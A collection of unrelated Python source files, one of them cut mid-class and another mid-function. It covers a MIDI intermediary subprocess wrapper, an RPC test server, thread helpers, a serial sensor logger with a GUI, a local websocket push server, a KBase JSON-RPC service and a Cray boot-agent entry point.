#sem_2.acquire()
#else:
#print("[OUT]",line)
sys.stdout.flush();
def __monitor_stderr(self):
while True:
line = self.__proc.stderr.readline()
if line==b'': return
if self.__requires_monitor_stderr:
print(line.decode(),end='')
sys.stdout.flush();
def __keepalive_sender(self):
while not self.__sem_keepalive.acquire(True,1.0):
self.__proc.stdin.write(b'\xFF')
self.__proc.stdin.flush()
def _prepare(self):
self.__proc = subprocess.Popen(self.interMidiator, #'a:/dropbox/home/git/intermidiator/intermidiator.exe',
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
s_ready = self.__proc.stdout.readline();
if s_ready == b'READY\r\n' : self.__crlf, self.__terminator = True, b'\r\n'
elif s_ready == b'READY\n' : self.__crlf, self.__terminator = False, b'\n'
else:
print('ERROR!')
return False
#__monitor_stdout, __monitor_stderr = self.generate_monitors();
self.__sem_1 = threading.Semaphore(0)
self.__sem_2 = threading.Semaphore(0)
self.__sem_keepalive = threading.Semaphore(0)
self.__thread_monitor_stdout = threading.Thread(target=self.__monitor_stdout)
self.__thread_monitor_stderr = threading.Thread(target=self.__monitor_stderr)
self.__thread_keepalive_sender = threading.Thread(target=self.__keepalive_sender)
self.__thread_keepalive_sender.start()
self.__callback_dic = {}
return True
def _start(self):
self.__thread_monitor_stdout.start()
self.__thread_monitor_stderr.start()
def start_process(self):
self._prepare()
self._start()
def debug(self, state:bool):
self.__proc.stdin.write(b'DEBUG ')
self.__proc.stdin.write(b'ON' if state else b'OFF')
self.__proc.stdin.write(self.__terminator)
def __enum_io(self,cmd):
self.__proc.stdin.write(cmd)
self.__proc.stdin.write(self.__terminator)
self.__proc.stdin.flush()
self.__sem_1.acquire()
names = self.__gResult;
self.__sem_2.release()
return names
def enum_input(self):
return self.__enum_io(b'LIST INPUT')
def enum_output(self):
return self.__enum_io(b'LIST OUTPUT')
def __open_io(self, index, name, candidates, cmdHeader, enumerator, dev_ctor):
if index and not isinstance(index, int): raise(ValueError)
if name and not isinstance(name, str): raise(ValueError)
if candidates and not isinstance(candidates,list) and not isinstance(candidates,tuple):
raise(ValueError)
if (index,name,candidates).count(None) != 2: raise(ValueError)
if name:
devNames = enumerator()
index = devNames.index(name)
elif candidates:
devNames = enumerator()
for c in candidates:
if c in devNames:
index = devNames.index(c)
break
if not index: raise(Exception('device name not found'))
wr = self.__proc.stdin.write
wr(cmdHeader)
wr(b'%X' % index)
wr(self.__terminator)
self.__proc.stdin.flush()
self.__sem_1.acquire()
hexstr = self.__gResult;
self.__sem_2.release()
handle = int_from_hex3(hexstr[0],hexstr[1],hexstr[2])
#print(handle)
return dev_ctor(handle)
def open_input(self,*, index=None, name=None, candidates=None, translate=None):
if not translate:
cmd = b'OPEN INPUT '
elif translate == 8:
cmd = b'OPEN INPUT8T '
elif translate == 9:
cmd = b'OPEN INPUT9T '
else: raise(ValueError)
return self.__open_io(index, name, candidates, cmd,
self.enum_input, MidiInDevice)
def open_output(self,*, index=None, name=None, candidates=None):
return self.__open_io(index,name,candidates,b'OPEN OUTPUT ',
self.enum_output, MidiOutDevice)
def close(self, dev):
if isinstance(dev, MidiInDevice):
body = b'INPUT %X' % dev.handle
elif isinstance(dev, MidiOutDevice):
body = b'OUTPUT %X' % dev.handle
else:
raise(ValueError)
self.__proc.stdin.write(b'CLOSE ')
self.__proc.stdin.write(body)
self.__proc.stdin.write(self.__terminator)
self.__proc.stdin.flush()
def listen(self, dev):
if not isinstance(dev, MidiInDevice): raise(ValueError)
self.__proc.stdin.write(b'LISTEN ')
self.__proc.stdin.write(b'%X' % dev.handle)
self.__proc.stdin.write(self.__terminator)
self.__proc.stdin.flush()
def send(self, dev, msg):
if not isinstance(dev, MidiOutDevice): raise(ValueError)
if isinstance(msg,str): msg = msg.encode()
elif not isinstance(msg, bytes): raise(ValueError)
wr = self.__proc.stdin.write
wr(b'SEND ')
wr(b'%X ' % dev.handle)
wr(msg)
wr(self.__terminator)
self.__proc.stdin.flush()
__current_callback_id = 100
def __generate_callback_id(self):
self.__current_callback_id += 1
return self.__current_callback_id
def register_callback(self, target, signal_pattern, function):
self.callback(target, signal_pattern, function)
def callback(self, target, signal_pattern, function):
self.__proc.stdin.write(b'CALLBACK ')
if target is None or target is '*': self.__proc.stdin.write(b'* ')
elif not isinstance(target, MidiInDevice): raise(ValueError)
else: self.__proc.stdin.write(b'%X ' % target.handle)
if not isinstance(signal_pattern, bytes):
signal_pattern = signal_pattern.encode()
self.__proc.stdin.write(signal_pattern)
self.__proc.stdin.write(b' ')
id = self.__generate_callback_id()
self.__callback_dic[id] = function
self.__proc.stdin.write(b'%d' % id)
self.__proc.stdin.write(self.__terminator)
self.__proc.stdin.flush()
def sync(self):
wr = self.__proc.stdin.write
wr(b'ECHO SYNC')
wr(self.__terminator)
self.__proc.stdin.flush()
self.__sem_1.acquire()
s = self.__gResult;
self.__sem_2.release()
if b'SYNC' != s:
raise(Exception('Midiator cannot syncronize'))
def _terminate(self):
self.__sem_keepalive.release()
self.__thread_keepalive_sender.join()
wr = self.__proc.stdin.write
wr(b'QUIT')
wr(self.__terminator)
self.__proc.stdin.flush()
self.__thread_monitor_stdout.join()
self.__thread_monitor_stderr.join()
def stop_process(self):
self.sync()
self._terminate()
def _unsafe_communicate(self, bs):
self.__proc.stdin.write(bs);
self.__proc.stdin.write(self.__terminator);
self.__proc.stdin.flush();
###
MTC = 'mtc'
SONG_POS = 'songpos'
SONG = 'song'
TUNE_REQ = 'tunereq'
EOX = 'eox'
CLOCK = 'clock'
START = 'start'
CONTINUE = 'continue'
STOP = 'stop'
ACTIVE = 'active'
RESET = 'reset'
NOTEOFF = 'noteoff'
NOTEON = 'noteon'
KEYPRESS = 'keypress'
CONTROL = 'control'
PROGRAM = 'program'
PRESSUER = 'pressuer'
BEND = 'bend'
def signal_type(signal):
h = signal[0]
if h == 'F':
return {'1':MTC,'2':SONGPOS,'3':SONG,'6':TUNEREQ,
'7':EOX,'8':CLOCK,'A':START,'B':CONTINUE,
'C':STOP,'E':ACTIVE,'F':RESET}[signal[1]]
else:
return {'8':NOTEOFF, '9':NOTEON, 'A':KEYPRESS, 'B':CONTROL,
'C':PROGRAM, 'D':PRESSUER, 'E':BEND}[h]
|
server.py
|
# encoding=utf-8
import sys
sys.path.append("../../..")
from simplerpc.rpcserver import RpcServer
from simplerpc.simplerpc import dispatcher, AsyncResponse
import time
@dispatcher.add_method
def foobar(**kwargs):
return kwargs["foo"] + kwargs["bar"]
@dispatcher.add_method
def make_error(*args):
raise
@dispatcher.add_method
def delayecho(*args):
r = AsyncResponse()
from threading import Thread
def func(r):
time.sleep(5)
r.result(args)
Thread(target=func, args=(r,)).start()
return r
@dispatcher.add_method
def delayerror(*args):
r = AsyncResponse()
from threading import Thread
def func(r):
time.sleep(5)
r.error(RuntimeError("something wrong here"))
Thread(target=func, args=(r,)).start()
return r
def test_with_tcp():
from simplerpc.transport.tcp import TcpServer
s = RpcServer(TcpServer())
s.run()
# s.console_run({"s": s})
def test_with_sszmq():
from simplerpc.transport.sszmq import SSZmqServer
s = RpcServer(SSZmqServer())
s.run()
if __name__ == '__main__':
test_with_tcp()
# test_with_sszmq()
|
threads.py
|
__author__ = "Altertech Group, http://www.altertech.com/"
__copyright__ = "Copyright (C) 2018-2019 Altertech Group"
__license__ = "Apache License 2.0"
__version__ = "0.2.7"
import threading
from functools import wraps
from pyaltt import task_supervisor
from pyaltt import TASK_NORMAL
class LocalProxy(threading.local):
def get(self, attr, default=None):
return getattr(self, attr, default)
def has(self, attr):
return hasattr(self, attr)
def set(self, attr, value):
return setattr(self, attr, value)
def clear(self, attr):
return delattr(self, attr) if hasattr(self, attr) else True
def background_task(f, *args, **kwargs):
@wraps(f)
def start_thread(*args, **kw):
t = threading.Thread(
group=kwargs.get('group'),
target=f,
name=kwargs.get('name'),
args=args,
kwargs=kw)
if kwargs.get('daemon'): t.setDaemon(True)
starter = threading.Thread(
target=_background_task_starter,
args=(t, kwargs.get('priority', TASK_NORMAL)))
starter.setDaemon(True)
starter.start()
if kwargs.get('wait_start'):
starter.join()
return t
return start_thread
def _background_task_starter(t, priority):
if task_supervisor.acquire(t, priority):
t.start()
releaser = threading.Thread(target=_background_task_releaser, args=(t,))
releaser.setDaemon(True)
releaser.start()
def _background_task_releaser(t):
t.join()
task_supervisor.release(t)
|
OB_tkwindowv4.py
|
from OB_classesv3 import On_Box_Window
import time
from Decoder import *
from threading import Thread
import serial.tools.list_ports
#import glances_sub
from glances_sub import system_specs
import watchdog
import os
import datetime as dt
ser = serial.Serial("/dev/ttyACM0",9600)
ser.flush()
parser = binaryPacketParser()
#First time running the Decoder will give empty packets, so throw those away immediately.
IMU_packets = parser.parseBytes(ser.read(88))
aud_packets = parser.parseBytes(ser.read(1078))
def packet_len_time_check(IMUpack, audpack,starttime):
if len(IMUpack) == 2 or len(audpack) == 2:
gui.notworking()
print("EMPTY PACKETS")
return
# elif(csvFile.closed):
# gui.notworking()
# return
else:
timestamp_post = dt.datetime.now()
print("Timestamp_post: " + str(timestamp_post))
time_diff = timestamp_post - starttime;
# print("Timestamp: " + str(starttime))
print("TIME DIFFERENCE:" + str(time_diff))
if (time_diff.total_seconds() > 8):
print("ERROR ERROR ERROR ERROR ERROR")
# print(time_diff.total_seconds())
gui.notworking()
return
def data_management(window):
while(True):
t_end = time.time() + 86400
now = dt.datetime.now().strftime('%Y-%m-%d-%M-%S')
csvname = 'IMUaudio'+ now + '.csv'
with open(csvname,'w') as csvFile:
while time.time() < t_end:
timestamp = dt.datetime.now()
print("Start of loop stamp: " + str(timestamp))
csvFile.write(str(timestamp)+'\n')
try:
IMU_packets = parser.parseBytes(ser.read(88))
csvFile.write(str(IMU_packets)+'\n\n')
aud_packets = parser.parseBytes(ser.read(1078))
csvFile.write(str(aud_packets)+'\n\n')
window.root.after(100, packet_len_time_check,IMU_packets,aud_packets, timestamp)
except serial.SerialException:
window.notworking()
print("ERRRRORRR")
return None
dogqueue = watchdog.q
#def main():
gui = On_Box_Window()
gui.start()
gui.PIvideo_stream(dogqueue)
RPi = system_specs()
system_thread = Thread(target=RPi.check_all,args=[gui])
system_thread.start()
data_thread = Thread(target=data_management,args=[gui])
data_thread.start()
watchdog = Thread(target=watchdog.grabqueueitem, args=[gui])
watchdog.start()
gui.mainloop()
comm = "python3 allmightydog.py"
os.system(comm)
#if __name__ == "__main__":
# main()
|
simple_pusher.py
|
"""A really dump pusher 'clone', for use in testing and running locally."""
import argparse
import collections
import json
import logging
import SimpleHTTPServer
import SocketServer
import sys
import threading
import time
import SimpleWebSocketServer
HTTP_PORT = 8101
WEBSOCKET_PORT = 8102
LOGFMT = '%(asctime)s %(levelname)s %(filename)s:%(lineno)d - %(message)s'
class SocketHandler(SimpleWebSocketServer.WebSocket):
"""Represents a websocket connection."""
# pylint: disable=invalid-name
def __init__(self, sockets, server, sock, address):
super(SocketHandler, self).__init__(server, sock, address)
self._sockets = sockets
self._channels = []
def handleMessage(self):
"""Only message we get is a subscription."""
if self.data is None:
return
try:
# message should be a subscription, of form {channel: 'channel_name'}
logging.info('\'%s\' received', self.data)
data = json.loads(self.data.decode('utf-8'))
self._channels.append(data['channel'])
self._sockets[data['channel']].append(self)
except:
logging.error('Error handling message:', exc_info=sys.exc_info())
def handleConnected(self):
logging.info('%s connected', self.address)
def handleClose(self):
logging.info('%s closed', self.address, exc_info=sys.exc_info())
for channel in self._channels:
self._sockets[channel].remove(self)
class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Represents a http requests."""
# pylint: disable=invalid-name,too-many-public-methods
def __init__(self, sockets, request, client_address, server):
self._sockets = sockets
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(
self, request, client_address, server)
def do_POST(self):
"""Send request body to /channel."""
try:
channel = self.path.split('/')[-1]
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
#logging.info('Sending \"%s\" to \"%s\"', post_body, channel)
for socket in self._sockets[channel]:
socket.sendMessage(post_body)
self.send_response(204, '')
except:
logging.error('Error sending message:', exc_info=sys.exc_info())
class SimplePusher(object):
"""A very simple websocket / push service."""
def __init__(self, args):
self._args = args
self._sockets = collections.defaultdict(list)
self._httpd = None
self._httpd_thread = None
self._websocket_server = None
self._websocket_server_thread = None
def _http_request_handler(self, request, client_address, server):
return ServerHandler(self._sockets, request, client_address, server)
def _websocket_request_handler(self, server, sock, addr):
return SocketHandler(self._sockets, server, sock, addr)
def start(self):
"""Start this."""
logging.info('Starting local websocket server.')
self._httpd = SocketServer.TCPServer(
('', self._args.http_port), self._http_request_handler)
self._httpd_thread = threading.Thread(target=self._httpd.serve_forever)
self._httpd_thread.start()
self._websocket_server = SimpleWebSocketServer.SimpleWebSocketServer(
'', self._args.websocket_port, self._websocket_request_handler)
self._websocket_server_thread = threading.Thread(
target=self._websocket_server.serveforever)
self._websocket_server_thread.start()
def stop(self):
"""Stop this."""
logging.info('Stopping local websocket server.')
self._httpd.shutdown()
self._httpd_thread.join()
self._websocket_server.close()
self._websocket_server_thread.join()
def main():
logging.basicConfig(format=LOGFMT, level=logging.DEBUG)
parser = argparse.ArgumentParser()
parser.add_argument('--http_port',
default=HTTP_PORT)
parser.add_argument('--websocket_port',
default=WEBSOCKET_PORT)
args = parser.parse_args()
pusher = SimplePusher(args)
pusher.start()
try:
while True:
time.sleep(100)
except:
pass
pusher.stop()
if __name__ == '__main__':
main()
|
kb_virsorter2Server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_virsorter2.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_virsorter2'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_virsorter2.kb_virsorter2Impl import kb_virsorter2 # noqa @IgnorePep8
impl_kb_virsorter2 = kb_virsorter2(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_virsorter2'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_virsorter2.run_kb_virsorter2,
name='kb_virsorter2.run_kb_virsorter2',
types=[dict])
self.method_authentication['kb_virsorter2.run_kb_virsorter2'] = 'required' # noqa
self.rpc_service.add(impl_kb_virsorter2.status,
name='kb_virsorter2.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_virsorter2 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
__main__.py
|
#!/usr/bin/env python3
#
# MIT License
#
# (C) Copyright 2019-2022 Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
import json
import sys
import os
import logging
import threading
from queue import Queue, Empty
from . import TransientException, NontransientException, InvalidInput
from .agent import BootSetAgent
from .bosclient import SessionStatus
from .connection import wait_for_istio_proxy
from .sessiontemplate import TemplateException
LOGGER = logging.getLogger("cray.boa")
# Note; the above configures the project level logger, which is what we
# intend. If additional logging is desired, the root logger can also be
# configured. Configuring only the project level logger allows only cray.boa
# logs to populate to the event stream. Configuring the root logger allows
# for all related python libraries (requests) to also log to standard out.
# Typically, this is not desired because the requests library is a well
# understood, externally maintained package. We do not expose the ability
# to show logs from other project code bases here. To do that, simply
# uncomment the below:
# LOGGER = logging.getLogger()
VALID_OPERATIONS = ["boot", "configure", "reboot", "shutdown"]
BOOT_SESSION_FILE = "/mnt/boot_session/data.json"
class IterableQueue(Queue):
def __iter__(self):
while True:
try:
yield self.get_nowait()
except Empty:
return
def run():
"""
For each boot set in the session, launch a BOA agent to execute the desired operation
on the nodes in that boot set.
"""
